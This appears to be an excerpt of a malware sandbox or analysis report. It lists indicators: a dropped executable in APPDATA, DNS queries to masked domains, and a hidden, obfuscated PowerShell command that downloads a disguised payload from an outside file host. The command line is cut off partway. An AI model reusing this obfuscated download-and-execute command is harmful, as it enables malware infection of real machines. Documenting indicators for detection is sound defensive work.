Technical Information
- %APPDATA%\b.exe
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK l.###4top.io
- DNS ASK ma####p.ddns.net
- DNS ASK microsoft.com
- '%APPDATA%\b.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://l.top4top.io/p_16923g0zi1.jpg'',$env:APPDATA+''\\''+''...